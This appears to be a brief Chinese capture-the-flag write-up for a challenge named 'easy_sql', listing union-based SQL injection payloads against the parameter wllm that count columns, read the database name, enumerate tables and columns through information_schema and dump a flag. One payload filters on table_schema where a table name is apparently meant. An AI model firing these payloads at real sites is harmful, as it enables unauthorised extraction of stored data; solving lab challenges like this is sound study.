easy_sql

title提示参数是wllm

order by查看有几列

得到3列

改wllm=-1

?wllm=-1’ union select 1,2,3 --+

得到2,3

?wllm=-1' union select 1,2,database()--+

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test_tb'--+

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+

得到flag

评论